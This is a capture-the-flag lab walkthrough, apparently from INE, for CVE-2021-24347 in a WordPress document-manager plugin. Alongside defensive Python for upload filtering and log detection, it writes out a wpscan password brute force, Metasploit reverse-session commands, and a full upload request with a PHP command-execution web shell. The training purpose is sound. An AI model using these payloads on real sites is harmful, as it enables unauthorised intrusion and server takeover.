    17 October 22

    WordPress Plugin SP Project and Document Manager RCE (CVE-2021-24347)

    Posted by INE

    In our lab walkthrough series, we go through selected lab exercises on our INE Platform. Subscribe or sign up for a 7-day, risk-free trial with INE and access this lab and a robust library covering the latest in Cyber Security, Networking, Cloud, and Data Science!

    This exercise is to understand how to exploit the WordPress Plugin SP Project and Document Manager v4.21 to gain a shell on the target machine (CVE-2021-24347).

    Purpose: We will learn how to exploit WordPress Plugin SP Project and Document Manager using the Metasploit Framework module. We will also learn how to exploit it manually to better understand the vulnerability.

    Goal after completing this scenario: Access the /flag.txt file and read the flag!

    Technical difficulty: Beginner

    Introduction

    The SP Project & Document Manager WordPress plugin before v4.22 allows users to upload files. The plugin attempts to prevent PHP and other similar files that could be executed on the server from being uploaded by checking the file extension. In 2021, however, a critical vulnerability was found in this plugin: PHP files could still be uploaded by changing the case of the file extension, for example from "php" to "pHP".

    This vulnerability has been assigned the CVE id CVE-2021-24347. The CVSS score for this vulnerability is 8.8 High.
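    The check described above fails because the extension is compared as typed, so the blocklist never sees "pHP". The following is an added example, not the plugin's own code (which is PHP and is not reproduced here); it models the flawed comparison in Python next to a hardened allowlist check. The extension sets and file names are constructed for the example.

```python
# Added example, not the plugin's own code: it models the extension check the
# advisory describes (a blocklist compared case-sensitively) next to a hardened
# allowlist check. Extension sets below are constructed for the example.
import os
import re

# Extensions the modelled vulnerable check refuses, exactly as spelled in its list.
BLOCKED_EXTENSIONS = {"php", "php3", "php4", "php5", "phtml", "phar"}

# Allowlist for the hardened check: only the document/media types a file manager needs.
ALLOWED_EXTENSIONS = {"pdf", "doc", "docx", "xls", "xlsx", "png", "jpg", "jpeg", "txt"}

# Only plain alphanumeric extension parts are accepted by the hardened check.
EXT_PART = re.compile(r"[a-z0-9]+")


def vulnerable_is_blocked(filename: str) -> bool:
    """Models the flawed check: the raw extension is compared against the
    blocklist without normalising case, so 'backdoor.pHP' passes even though
    Apache's mod_mime matches extensions case-insensitively and executes it."""
    ext = filename.rsplit(".", 1)[-1] if "." in filename else ""
    return ext in BLOCKED_EXTENSIONS


def hardened_is_allowed(filename: str) -> bool:
    """Allowlist check: lower-case the basename, validate every extension part
    (so 'shell.php.jpg' style names are refused too), reject anything on the
    blocklist in any position, and require the final extension to be allowed."""
    name = os.path.basename(filename).lower()
    parts = name.split(".")
    if len(parts) < 2 or not parts[0]:
        return False                     # no extension, or a dot-file
    exts = parts[1:]
    if not all(EXT_PART.fullmatch(p) for p in exts):
        return False                     # empty or non-alphanumeric extension part
    if any(p in BLOCKED_EXTENSIONS for p in exts):
        return False
    return exts[-1] in ALLOWED_EXTENSIONS


if __name__ == "__main__":
    for name in ("report.pdf", "backdoor.php", "backdoor.pHP", "shell.php.jpg"):
        print(f"{name:16} blocked-by-vulnerable-check={vulnerable_is_blocked(name)!s:5} "
              f"allowed-by-hardened-check={hardened_is_allowed(name)}")
```

    The design point is that an allowlist with case normalisation does not need to enumerate every dangerous spelling; a blocklist does, and one missed variant is enough.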

    What is SP Project & Document Manager?

    It is a Document, File & Media Manager plugin for WordPress. It allows one to upload, manage, track and share documents, files, or media.

    Source: https://wordpress.org/plugins/sp-client-document-manager

    Lab Environment

    In this lab environment, the user is going to get access to a Kali GUI instance. A vulnerable version of SP Project & Document Manager WordPress plugin is running on the target machine. It can be accessed using the tools installed on Kali at http://demo.ine.local.

    Objective: Exploit the remote code execution (RCE) vulnerability in SP Project & Document Manager WordPress plugin v4.21 to gain shell access on the target server and retrieve the flag!

    The following username might be helpful:

    • Username: admin

    The following Dictionary might be helpful:

    • /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt

    sp_project_0_1.png

    Tools

    The best tools for this lab are:

    • Nmap

    • Dirb

    • Curl

    • WPScan

    • A web browser

    • Metasploit Framework

    Solution

    Step 1: Open the lab link to access the Kali GUI instance.

    sp_project_1.png

    Step 2: Check if the provided machine/domain is reachable.

    Command: ping -c3 demo.ine.local

    sp_project_2.png

    The provided machine is reachable. 192.96.197.3 is the IP address of the target machine.

    Step 3: Check open ports on the provided machine.

    Command: nmap -sS -sV demo.ine.local

    sp_project_3.png

    Apache httpd 2.4.29 is running on port 80 on the target machine.

    Step 4: Next we will use the dirb tool to find files and directories on the web server.

    Command: dirb http://demo.ine.local

    sp_project_4.png

    Step 5: We can see that WordPress is running on the target machine. We will run the dirb tool again to find the plugins installed on the target machine.

    Command: 

    dirb http://demo.ine.local/wp-content/plugins /usr/share/nmap/nselib/data/wp-plugins.lst

    sp_project_5.png

    Step 6: We can see that the sp-client-document-manager plugin is installed on the target machine. All WordPress plugins have either a "readme.txt" or a "README.txt" file in their directory, from which we can find the plugin version. We can use the curl command here to view the content of the "readme.txt" file.

    Command: 

    curl http://demo.ine.local/wp-content/plugins/sp-client-document-manager/readme.txt

    sp_project_6.png

    The Stable tag shows 4.21, which is a vulnerable version.
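    The same readme check is useful from the other side: a site owner can read the Stable tag of every installed plugin and compare it with the first fixed release. The following is an added example, not from the page or the plugin; the readme text in it is constructed, and the only page-derived values are the plugin path and the fixed version 4.22.

```python
# Added example, not from the page or the plugin: parse the "Stable tag" from a
# WordPress plugin readme.txt and compare it with the first fixed release, as a
# site owner's plugin-inventory check. SAMPLE_README is constructed; the real file
# on the lab target is served from wp-content/plugins/sp-client-document-manager/readme.txt.
import re
from typing import Optional

# Constructed sample of the header block a plugin readme.txt begins with.
SAMPLE_README = """\
=== SP Project & Document Manager ===
Contributors: example-contributor
Tags: document manager, file manager
Requires at least: 4.0
Stable tag: 4.21
License: GPLv2
"""

FIXED_VERSION = "4.22"   # first release no longer affected by CVE-2021-24347 (page)

STABLE_TAG_RE = re.compile(r"^Stable tag:\s*(\S+)\s*$", re.MULTILINE | re.IGNORECASE)


def parse_stable_tag(readme: str) -> Optional[str]:
    """Return the Stable tag value, or None if the header is missing."""
    m = STABLE_TAG_RE.search(readme)
    return m.group(1) if m else None


def version_tuple(version: str) -> tuple:
    """Numeric components only, so '4.21' -> (4, 21); 'trunk' -> ()."""
    return tuple(int(p) for p in re.findall(r"\d+", version))


def is_affected(version: str, fixed: str = FIXED_VERSION) -> bool:
    """True when the installed version predates the fixed release."""
    return version_tuple(version) < version_tuple(fixed)


def check_readme(readme: str) -> dict:
    """Summarise one readme: tag found, and whether it is an affected version.
    'affected' is None when the tag is absent or not numeric (e.g. 'trunk')."""
    tag = parse_stable_tag(readme)
    affected = is_affected(tag) if tag is not None and version_tuple(tag) else None
    return {"stable_tag": tag, "affected": affected}


if __name__ == "__main__":
    print(check_readme(SAMPLE_README))   # {'stable_tag': '4.21', 'affected': True}
```

    Versions are compared as integer tuples rather than as strings, so 4.3 correctly sorts below 4.22. The Stable tag in a deployed readme normally matches the installed release, but the authoritative value is the Version header of the plugin's main PHP file, which the WordPress admin plugin list also shows.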

    Step 7: Next we will use wpscan to brute force the password needed to log in to the WordPress application.

    You can find the dictionary required to brute force the password at the following location:

    • Passwords - /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt

    As we know that the target user is admin, we will directly run a dictionary attack against the admin user to find the valid password.

    Commands:

    cd /usr/share/metasploit-framework/data/wordlists

    wpscan --url http://demo.ine.local --passwords unix_passwords.txt --usernames admin 

    Note: If it prompts to update the database, type N, for now.

    sp_project_7.png

    sp_project_7_1.png

    We get a valid combination:

    • Username: admin

    • Password: password1

    You can verify if the credentials are valid by logging in to the application at http://demo.ine.local/wp-admin.

    Exploit using Metasploit module

    Step 8: First check the attacker machine's IP address.

    Command: ifconfig 

    sp_project_8.png

    192.96.197.2 is the attacker machine's IP address.

    Step 9: Start the msfconsole and do a search for the module for CVE-2021-24347.

    Commands:

    msfconsole -q

    search CVE-2021-24347

    sp_project_9.png

    Step 10: We will use the above listed module. We will use the application credentials that we found before. Run the following commands one by one:

    Commands:

    use exploit/multi/http/wp_plugin_sp_project_document_rce

    set username admin

    set password password1

    set RHOSTS 192.96.197.3

    set LHOST 192.96.197.2

    check

    exploit

    Note: RHOSTS is the target machine's IP address and LHOST is the attacker machine's IP address. These values may differ in your environment.

    sp_project_10.png

    We have successfully gained the meterpreter session.

    Step 11: Let's retrieve the flag. Run the following command in the meterpreter session to get a system shell.

    Command: shell

    sp_project_11.png

    Step 12: Read the flag.

    Commands: 

    ls /

    cat /flag.txt

    sp_project_12.png

    FLAG: 4c5b7206468fd8cfdb779af6a037b6d7

    Exploit Manually

    Step 13: Navigate to the following URL and log in to the WordPress application using the credentials that we found before.

    URL: http://demo.ine.local/wp-admin

    • Username: admin

    • Password: password1

    sp_project_13.png

    Step 14: Configure the intercept on the browser as shown below.

    sp_project_14.png

    Step 15: Start Burp Suite and just refresh the current page to capture the request. Next, send the captured request to the repeater. And then you can turn off the intercept.

    sp_project_15.png

    Step 16: We will use the endpoint below to push a PHP backdoor into the uploads/sp-client-document-manager/1 directory. Note that as we have only one user, i.e. admin, the id for admin is 1.

    Endpoint:

    URL: http://demo.ine.local/wp-admin/admin.php?page=sp-client-document-manager-fileview&id=1

    Replace the request in the repeater with the following. Remember to change the cookie in your case.

    Request

    POST /wp-admin/admin.php?page=sp-client-document-manager-fileview&id=1 HTTP/1.1
    Host: demo.ine.local
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://demo.ine.local/wp-admin/admin.php?page=sp-client-document-manager-fileview&id=1
    Content-Type: multipart/form-data; boundary=---------------------------1624163623105522541544277064
    Content-Length: 1220
    Origin: http://demo.ine.local
    Connection: close
    Cookie: wordpress_a0c7d97dc4abfe43e44a8edf6273faf0=admin%7C1662611480%7CT6rfeLpZPfKF5ALMS94cmkjLLqwxXmyVcUKD5mafpWZ%7Cffd539fd7fcb51cf5096c9e18cafdae38f68827e55b4a27cf814d8286dfe62d0; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_a0c7d97dc4abfe43e44a8edf6273faf0=admin%7C1662611480%7CT6rfeLpZPfKF5ALMS94cmkjLLqwxXmyVcUKD5mafpWZ%7Cb4113bb9de22771a566c679b71e4b14aca40a6ac6724d5bb4dd28f77964fb0a6; wp-settings-1=uploader%3D1; wp-settings-time-1=1662438680
    Upgrade-Insecure-Requests: 1

    -----------------------------1624163623105522541544277064
    Content-Disposition: form-data; name="cdm_upload_file_field"

    818034d247
    -----------------------------1624163623105522541544277064
    Content-Disposition: form-data; name="_wp_http_referer"

    /wp-admin/admin.php?page=sp-client-document-manager-fileview&id=1
    -----------------------------1624163623105522541544277064
    Content-Disposition: form-data; name="dlg-upload-name"


    -----------------------------1624163623105522541544277064
    Content-Disposition: form-data; name="dlg-upload-file[]"; filename=""
    Content-Type: application/octet-stream


    -----------------------------1624163623105522541544277064
    Content-Disposition: form-data; name="dlg-upload-file[]"; filename="backdoor.pHP"
    Content-Type: application/x-php

    <?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>
    -----------------------------1624163623105522541544277064
    Content-Disposition: form-data; name="dlg-upload-notes"


    -----------------------------1624163623105522541544277064
    Content-Disposition: form-data; name="sp-cdm-community-upload"

    Upload
    -----------------------------1624163623105522541544277064--

    Note that in this request, the filename we are providing is backdoor.pHP which would slip through the check and get uploaded.

    sp_project_16.png

    Hit Send.

    sp_project_16_1.png

    A new file has been created in the uploads/sp-client-document-manager/1 folder.

    Step 17: Access the backdoor and run the command ls /.

    URL:

    http://demo.ine.local/wp-content/uploads/sp-client-document-manager/1/backdoor.php?cmd=ls /

    sp_project_17.png

    The flag is there. Retrieve the flag with cat /flag.txt command.

    sp_project_17_1.png

    FLAG: 4c5b7206468fd8cfdb779af6a037b6d7
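    Both halves of this lab leave traces in the web server's access log: the wpscan dictionary attack of Step 7 is a burst of POSTs to wp-login.php from one source, and the backdoor of Steps 16 and 17 is a PHP file being requested from under wp-content/uploads, a directory WordPress never needs to execute scripts from. The following is an added example, not part of the original walkthrough, showing detection logic for both over constructed Apache combined-format log lines; the IP addresses and URLs are the ones on this page, while the timestamps, the second client 10.0.0.5, the user agent and the threshold are constructed.

```python
# Added example, not part of the walkthrough: detection logic a site defender can
# run over Apache access logs for the two observable stages of this lab, the
# wpscan password guessing against wp-login.php (Step 7) and the execution of a
# PHP file from the uploads tree (Step 17). SAMPLE_LOG, its timestamps and the
# threshold are constructed; the IP addresses and URLs are the ones on the page.
import re
from collections import Counter
from typing import Dict, List, Optional
from urllib.parse import unquote, urlsplit

UA = "Mozilla/5.0 (X11; Linux x86_64)"   # constructed, deliberately generic

# Constructed sample in Apache "combined" log format.
SAMPLE_LOG = f"""\
192.96.197.2 - - [07/Sep/2022:04:10:01 +0000] "POST /wp-login.php HTTP/1.1" 200 4213 "-" "{UA}"
192.96.197.2 - - [07/Sep/2022:04:10:01 +0000] "POST /wp-login.php HTTP/1.1" 200 4213 "-" "{UA}"
192.96.197.2 - - [07/Sep/2022:04:10:02 +0000] "POST /wp-login.php HTTP/1.1" 200 4213 "-" "{UA}"
192.96.197.2 - - [07/Sep/2022:04:10:02 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "{UA}"
10.0.0.5 - - [07/Sep/2022:04:11:40 +0000] "GET /wp-content/uploads/2022/09/report.pdf HTTP/1.1" 200 88112 "-" "{UA}"
192.96.197.2 - - [07/Sep/2022:04:18:10 +0000] "GET /wp-content/uploads/sp-client-document-manager/1/backdoor.php?cmd=ls%20/ HTTP/1.1" 200 512 "-" "{UA}"
192.96.197.2 - - [07/Sep/2022:04:18:31 +0000] "GET /wp-content/uploads/sp-client-document-manager/1/Backdoor.PHP?cmd=cat%20/flag.txt HTTP/1.1" 200 64 "-" "{UA}"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
# Server-side script extensions; case-insensitive because that is the gap exploited here.
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar)$", re.IGNORECASE)
UPLOADS_PREFIX = "/wp-content/uploads/"


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Parse one combined-format line; returns None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ev = m.groupdict()
    url = urlsplit(ev["target"])
    ev["path"] = unquote(url.path)
    ev["query"] = unquote(url.query)
    return ev


def parse_log(text: str) -> List[Dict[str, str]]:
    return [ev for ev in (parse_line(l) for l in text.splitlines()) if ev]


def script_in_uploads(events: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Requests that execute a script under the uploads tree. WordPress never
    needs to run PHP from there, so every hit is worth an alert."""
    return [ev for ev in events
            if ev["path"].lower().startswith(UPLOADS_PREFIX) and SCRIPT_EXT.search(ev["path"])]


def login_bursts(events: List[Dict[str, str]], threshold: int = 3) -> Dict[str, int]:
    """Source IPs that POST to wp-login.php more than `threshold` times in the
    window covered by the events (constructed threshold; tune to the real site)."""
    counts = Counter(ev["ip"] for ev in events
                     if ev["method"] == "POST" and ev["path"] == "/wp-login.php")
    return {ip: n for ip, n in counts.items() if n > threshold}


if __name__ == "__main__":
    events = parse_log(SAMPLE_LOG)
    for ev in script_in_uploads(events):
        print(f"script in uploads: {ev['ip']} {ev['path']} ?{ev['query']}")
    for ip, n in login_bursts(events).items():
        print(f"login burst: {ip} made {n} POSTs to wp-login.php")
```

    The script rule matches on the decoded path with a case-insensitive extension test, so a mixed-case name like Backdoor.PHP is caught just as the lowercase one is. Alongside updating the plugin to 4.22 or later, the durable mitigation is to have the web server refuse to run PHP from wp-content/uploads at all (disabling the PHP handler for that directory in the Apache or nginx configuration), which turns an uploaded script into a plain file download.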

    Conclusion

    In this article, we learned how to exploit the remote code execution vulnerability that exists in SP Project & Document Manager WordPress plugin v4.21, both using the Metasploit module and manually.
